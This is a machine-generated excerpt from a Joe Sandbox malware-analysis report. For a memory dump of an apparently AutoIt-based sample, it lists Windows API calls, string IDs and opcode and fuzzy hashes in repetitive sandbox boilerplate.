                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: c80508a4ff5660dcf21b6cb697f4c77060be113b3d53e99300bbe6603b8b317e
                                              • Instruction ID: 23ba5ec1fa1a13d853a8d1b0968069282a10226df0a462fa51d19aed4d9af779
                                              • Opcode Fuzzy Hash: c80508a4ff5660dcf21b6cb697f4c77060be113b3d53e99300bbe6603b8b317e
                                              • Instruction Fuzzy Hash: 4EE012B1800204EFEF129FA0D808B9DBBF5AB8C310F118008F95AA7210CB3C9551CF50
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 0003E01E
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0003E037
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: bebc15e2baae478cd9f06e71c6180a8cf6a9f56960f8aae9d85b6cdce6b74412
                                              • Instruction ID: 36e3a9919cc86dbc0903e89de9012fb89978035ff8443de91533f151c05dc452
                                              • Opcode Fuzzy Hash: bebc15e2baae478cd9f06e71c6180a8cf6a9f56960f8aae9d85b6cdce6b74412
                                              • Instruction Fuzzy Hash: BE515971408B449BE321AF50EC85BAFB7FCFB85314F41484EF5D945192DB70A929CB26
                                              APIs
                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 000B8186
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000B819B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: 12f9d63ef608b0dd01e1b1c1c67fcf14db1abd7a6709fe581a90674915ffc0f9
                                              • Instruction ID: 43e01637d4f63db39b1bc479c21ea872c9d179c109bda0c6984124583e058a5e
                                              • Opcode Fuzzy Hash: 12f9d63ef608b0dd01e1b1c1c67fcf14db1abd7a6709fe581a90674915ffc0f9
                                              • Instruction Fuzzy Hash: 11410874A052099FDB54DF68C881BEA7BF9FB08340F10456AE908AB352DB71A956CF90
                                              APIs
                                              • __snwprintf.LIBCMT ref: 000A4132
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __snwprintf_memmove
                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                              • API String ID: 3506404897-2584243854
                                              • Opcode ID: 48d2f16cccb8ca2c292c577c1ff35b99d83df6811b7b5a3f40446d8f6d3d9e59
                                              • Instruction ID: 86d52551212e291cc50dd400a62a9ff77c68e8059a375653e95f6257c4943cd0
                                              • Opcode Fuzzy Hash: 48d2f16cccb8ca2c292c577c1ff35b99d83df6811b7b5a3f40446d8f6d3d9e59
                                              • Instruction Fuzzy Hash: 18218174A0021DAFCF10EFA4CC91EEE7BB5EF59340F444464F905AB242DB70A985CBA5
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000A28F8
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000A2921
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 474e8b9c2a75793931e1dcf5cbd822998772abaf1b0db8cc46ef57dbb5de8b99
                                              • Instruction ID: 77df817e0e9adf20fb5b4715338a9154c4b7f6b7c05735701b331c7ef8251495
                                              • Opcode Fuzzy Hash: 474e8b9c2a75793931e1dcf5cbd822998772abaf1b0db8cc46ef57dbb5de8b99
                                              • Instruction Fuzzy Hash: 9C11A070502225FAEB298F958C89EFBFBACFF06751F10823AF94556140EB746894D6F0
                                              APIs
                                                • Part of subcall function 000A86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,000A849D,?,00000000,?,?), ref: 000A86F7
                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 000A84A0
                                              • htons.WSOCK32(00000000,?,00000000), ref: 000A84DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 2496851823-2422070025
                                              • Opcode ID: 0e2e0f31b05c235317287796d2ed59082a45fc94234355fea5719b09583df135
                                              • Instruction ID: e3d4a5581b06cdf1d448f6e880e907de0004b5574327ff7ac89db8ecb28fe392
                                              • Opcode Fuzzy Hash: 0e2e0f31b05c235317287796d2ed59082a45fc94234355fea5719b09583df135
                                              • Instruction Fuzzy Hash: 45112B74604206ABDB24EFA4CC46FFEB364FF05310F108626F915572C2DB71A810C795
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000888A0
                                                • Part of subcall function 00053588: _doexit.LIBCMT ref: 00053592
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Message_doexit
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 1993061046-4017498283
                                              • Opcode ID: 750f0268a32a34385972e4ab6bbc7076d6de158e9156d82abec826a0f7e2cd67
                                              • Instruction ID: 2ba491e971c922fce205619f689a54959634095946c720b3092327f6a0536321
                                              • Opcode Fuzzy Hash: 750f0268a32a34385972e4ab6bbc7076d6de158e9156d82abec826a0f7e2cd67
                                              • Instruction Fuzzy Hash: 48D02B7138135832D25037E46C0BFCB7A488B05B51F00443AFF08A91C34DD5958082E5
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00070091
                                                • Part of subcall function 000AC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0007027A,?), ref: 000AC6E7
                                                • Part of subcall function 000AC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000AC6F9
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00070289
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                              • String ID: WIN_XPe
                                              • API String ID: 582185067-3257408948
                                              • Opcode ID: 37a2ab666989dd682adcf106ce4c2e3ced85c2d6e1112e60618489fa92c3e5cf
                                              • Instruction ID: 57983c8f9b3c781368ee429ab147f1742783ff97e9f43599ed8333f1ba8e4b54
                                              • Opcode Fuzzy Hash: 37a2ab666989dd682adcf106ce4c2e3ced85c2d6e1112e60618489fa92c3e5cf
                                              • Instruction Fuzzy Hash: D3F06D70D1410ADFDB66DBA0C998BECBBF8AB08300F248085E10AB2191CB785F80DF64